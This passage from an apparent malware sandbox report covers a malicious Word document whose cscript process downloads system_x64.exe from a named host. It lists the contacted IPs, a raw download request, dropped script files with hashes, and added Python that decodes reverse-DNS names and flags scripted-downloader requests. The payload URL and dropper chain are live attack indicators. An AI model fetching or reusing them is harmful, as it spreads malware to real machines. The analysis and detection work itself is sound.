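"""Turn reverse-lookup (PTR) names back into addresses and classify their scope."""
import ipaddress

# Four names taken from the DNS table above.
PTR_NAMES = [
    "112.240.168.192.in-addr.arpa",
    "18.29.125.64.in-addr.arpa",
    "229.197.13.212.in-addr.arpa",
    "5.2.5.d.b.b.2.d.9.1.4.1.7.8.d.a.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
]


def ptr_to_ip(name):
    """Decode an in-addr.arpa (reversed octets) or ip6.arpa (reversed nibbles) name."""
    labels = name.lower().rstrip(".").split(".")
    if labels[-2:] == ["in-addr", "arpa"]:
        octets = labels[:-2]
        if len(octets) != 4:
            raise ValueError(f"expected 4 octets in {name!r}")
        return ipaddress.IPv4Address(".".join(reversed(octets)))
    if labels[-2:] == ["ip6", "arpa"]:
        nibbles = labels[:-2]
        if len(nibbles) != 32 or any(len(n) != 1 for n in nibbles):
            raise ValueError(f"expected 32 single-hex-digit labels in {name!r}")
        return ipaddress.IPv6Address(int("".join(reversed(nibbles)), 16))
    raise ValueError(f"not a reverse-lookup name: {name!r}")


def scope_of(ip):
    """'internal' for RFC 1918, link-local and loopback space; 'external' otherwise."""
    if ip.is_private or ip.is_link_local or ip.is_loopback:
        return "internal"
    return "external"


def classify(names):
    """Return (name, address, scope) for each PTR name; names that are not PTR names are skipped."""
    rows = []
    for name in names:
        try:
            ip = ptr_to_ip(name)
        except ValueError:
            continue
        rows.append((name, str(ip), scope_of(ip)))
    return rows


if __name__ == "__main__":
    for name, addr, scope in classify(PTR_NAMES):
        print(f"{scope:<8} {addr:<28} <- {name}")
```

The 192.168.240.x names decode to the sandbox's own network, the fe80:: name to a link-local neighbour, and 229.197.13.212.in-addr.arpa to 212.13.197.229, which is chiark's address from the same table: the last hop of the trace. None of these lookups are attacker infrastructure; only secure.zenithglobalplc.com is.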
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
198.54.126.167 | 80/TCP | cscript.exe PID: 3720 | United States |
198.54.126.167 | 443/TCP | cscript.exe PID: 3720 | United States |
HTTP Traffic
Endpoint | Request | URL |
---|---|---|
198.54.126.167:80 (secure.zenithglobalplc.com) | GET | secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe |
Raw request:
GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: secure.zenithglobalplc.com
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
198.54.126.167 -> local:49207 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
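The captured request carries the default User-Agent of the WinHttp.WinHttpRequest COM object, the client VBScript and JScript droppers use, and asks for an .exe under a static-asset path on the host. The only Suricata hit is a TLS handshake failure on the port 443 connection from the same cscript.exe process, so the plaintext port 80 fetch is where the network detection opportunity lies. The Python below is an added example, not report content, that parses a raw request and applies those header-level checks; the report's request is copied verbatim and the browser request used for contrast is constructed.

```python
"""Header-level checks on a raw HTTP request, run on the capture above."""
import re
from urllib.parse import urlsplit

# Copied from the report's HTTP traffic table.
REPORT_REQUEST = (
    "GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: secure.zenithglobalplc.com\r\n"
    "\r\n"
)

# Constructed benign request for contrast (not from the report).
BROWSER_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
    "Accept: text/html,application/xhtml+xml;q=0.9,*/*;q=0.8\r\n"
    "\r\n"
)

# User-Agent fragment sent by default by the WinHTTP COM object (WinHttp.WinHttpRequest.5.1);
# browsers never send it, scripted downloaders often do.
SCRIPT_CLIENT_UA = ("WinHttp.WinHttpRequest",)
EXEC_EXT = re.compile(r"\.(exe|dll|scr|cpl|hta|vbs|jse|ps1|cmd|bat)$", re.I)
# Directories where a site normally serves static content, not binaries (heuristic list).
ASSET_DIRS = ("/assets/", "/plugins/", "/images/", "/uploads/", "/wp-content/")


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target, version and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def assess(raw):
    """Return the reconstructed URL and the list of findings for one request."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    path = urlsplit(req["target"]).path
    findings = []
    if any(marker in ua for marker in SCRIPT_CLIENT_UA):
        findings.append("script_client_user_agent")
    if EXEC_EXT.search(path):
        findings.append("executable_download")
        # An executable served from a site's static-asset tree points to a compromised
        # legitimate host rather than purpose-built infrastructure.
        if any(d in path.lower() for d in ASSET_DIRS):
            findings.append("executable_under_asset_path")
    return {"url": f"http://{host}{path}", "user_agent": ua, "findings": findings}


if __name__ == "__main__":
    for label, raw in (("report", REPORT_REQUEST), ("browser", BROWSER_REQUEST)):
        r = assess(raw)
        print(f"{label}: {r['url']} -> {r['findings'] or 'no findings'}")
```

The User-Agent check is the cheapest of the three to deploy as a proxy or IDS rule and is independent of the domain, so it keeps working when the hosting site changes; the asset-path check is a heuristic and should raise priority, not block on its own.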
Extracted Files
-
Clean 2
-
-
~_ecfa4d51114c6b273d6de314ce9f56.doc
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx
- Size
- 162B (162 bytes)
- Type
- data
- AV Scan Result
- 0/58
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- b60c0bb79b4b53294d99905c973caba3
- SHA1
- a7716d014025ca03b5324c8220e2459eea70b6b1
- SHA256
- a101d3605f8d1ca5cfb10c48dbdb24c45f2627c48f44a2bd2604b88c7b90d5f0
-
-
Informative Selection 2
-
-
presskey.cmd
- Size
- 22KiB (22213 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 3652)
- MD5
- 2836814f6665dc9b5c9f544a53233d9a
- SHA1
- 6ce48257d3e32129b3d3913f83cd3753464e72a0
- SHA256
- e352c07b12ef694b97a4a8dbef754fc38e9a528d581b9c37eabe43f384a8a519
-
tlofgkkjl15g5k.vbs
- Size
- 11KiB (11620 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- cmd.exe (PID: 3652)
- MD5
- ffb1646370b9cba92efaaa4d06d90570
- SHA1
- 2b52bd6e08f5d06de942ec5a230b88e609dcb1c3
- SHA256
- 74289d34679d88b8e7ca47ebce78931ff79a21a9b26fdf79d0022d62ffa8209a
-
-
Informative 16
-
-
30ecfa4d51114c6b273d6de314ce9f56.LNK
- Size
- 573B (573 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 11 22:29:28 2020, mtime=Wed Mar 11 22:29:28 2020, atime=Wed Mar 11 22:29:36 2020, length=427476, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- eecfad643e1d92d120096ce62f80d798
- SHA1
- fc55cf71cc58b822d0f19038072eddd4c3ca90ab
- SHA256
- 56d49c45c3030420c9dac143133d4c3ff0c2e92054a9d5a90964e20d1294c55a
-
Copy_of_30ecfa4d51114c6b273d6de314ce9f56.LNK
- Size
- 1.2KiB (1209 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Mar 11 22:33:00 2020, mtime=Wed Mar 11 22:33:00 2020, atime=Wed Mar 11 22:33:00 2020, length=95764, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 7b625dc0502c63e9d0695d216c111ebf
- SHA1
- 7abe253bb7ded9ea180aad10f6bcfc97c6a3ebb1
- SHA256
- 60832d27c120e4f612e142aac5ceb1f475caf76d8681c7fccf2092d72417afce
-
My Documents.LNK
- Size
- 907B (907 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Sun Dec 3 11:06:16 2017, mtime=Wed Mar 11 22:33:00 2020, atime=Wed Mar 11 22:33:00 2020, length=4096, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c8a43fe93040cd237e827420c53f749d
- SHA1
- 6d3c52d3534d1e0b480bd84ff689b0a8f9eaf4cc
- SHA256
- 3f04638fa1ada1c27cd5825c136fc266b3c24a5f3b8c98ad5496316cddf5de95
-
My Pictures.LNK
- Size
- 902B (902 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Sun Dec 3 11:06:16 2017, mtime=Wed Mar 11 23:10:00 2020, atime=Wed Mar 11 23:10:00 2020, length=0, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 6507638c225396f72c599953ee017d0f
- SHA1
- 6ac0b90787efd153921809f9a16fa27ca08a914f
- SHA256
- d738ef8edf3452363c541153a57431bdae460f69bff10cfc87e4b9d8c6c77c66
-
index.dat
- Size
- 275B (275 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c1f9ddd836dde706172db6fba6837cc5
- SHA1
- f6db43d8c33b2fdd7069d12cfad53d1b458c44ba
- SHA256
- e0917203011a9fa2ff7be97a1ab4aa9867497686008aaaf4f2d3531abe773078
-
F9WBNAXRJHNLDD2T43FV.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3272)
- MD5
- 45dcbd99748078a12fa1fc96db23d798
- SHA1
- afc574a66f18efb26ce6193d337acf32796473da
- SHA256
- 1fc6949ad94e52a2d12733c868308136dc5b38a8790aebeb1c1dc2f9beecc35d
-
D6FFDBE7.jpeg
- Size
- 80KiB (81478 bytes)
- Type
- img image
- Description
- JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], baseline, precision 8, 789x559, frames 3
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- a6453d381dd4d9fa212425bbc24ebe63
- SHA1
- dde4fb6bd21a36c8a38ae43cf11ab07744f198c5
- SHA256
- 97876e203a341427b28d622547f1b8f8a992eaa45924acdeb4cde60d3c967b54
-
MSForms.exd
- Size
- 144KiB (147284 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 4ca1945424877c7a36c581f6e4f0c85c
- SHA1
- 292e6860312c640c28187d07e743cddcea1b6397
- SHA256
- 54a1d09122ccd2c9a31b3ac01224d27ce6db338d132fcf8f13a98bb265ce691e
-
~WRD0000.tmp
- Size
- 256KiB (262144 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- c29133ca6746f4fcce8c8636615fc540
- SHA1
- 2e748348ff2110f143e7d61543c29925001b5f42
- SHA256
- 5e9cd552d1cdc45c704f2f4a39d5ca60a63f9a6bd65a9a320828656699c6e00b
-
presskey.jse
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
presskey.jse4
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
presskey.jse5
- Size
- 330KiB (338244 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 921352cc78f29a0f2a437d337d8c9a86
- SHA1
- 9b0adbf6865f01a44a1e06b0a7c53015d57e3abd
- SHA256
- a382ee16f41751f41b5628fb39612218d6b15a751c607c88fda39c65851860ca
-
presskey2.cmd
- Size
- 160B (160 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 31441d476eabded373bb68ea15aea83a
- SHA1
- 18e6bc47e344a171787cc3ce5414eff66ba7a495
- SHA256
- b907a34389a89bef3e9e9dff95f23092daf2140f329553b543cd99e8367ae96e
-
urlref_httpsecure.zenithglobalplc.comassetspluginsbootstrap-wizardsystem_x64.exe
- Size
- 289B (289 bytes)
- Type
- html
- Description
- HTML document, ASCII text
- Runtime Process
- WINWORD.EXE (PID: 2836)
- Context
- http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe
- MD5
- 3844776a61d76d74775b6eb522a05633
- SHA1
- af0c7e237a5a093aad891b6d254def86dcf36ce5
- SHA256
- 04dc115de46ed89b29f038d867e177d94d0bf9d1b09ebcff3e09c101af30e18c
-
~WRS_3A453929-2FEF-4064-B533-8FC8672F0C80_.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 4762b383873fc5165529cd8b44ba808d
- SHA1
- 7ee51094dcc803db1bda8a98eb88a51d77200cd3
- SHA256
- 979366f76459e449e0a0ec057370797df97b8228b155b6b62faa3dcd2ea0df90
-
~WRS_62DEE603-9E85-4752-BC6A-2A98D0CC80A7_.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2836)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
Notifications
-
Runtime
- Network whitenoise filtering (Process) was applied
- Not all Falcon MalQuery lookups completed in time
- Not all IP/URL string resources were checked online
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
- Not all sources for indicator ID "network-0" are available in the report
- Not all sources for indicator ID "registry-55" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Not all sources for indicator ID "string-43" are available in the report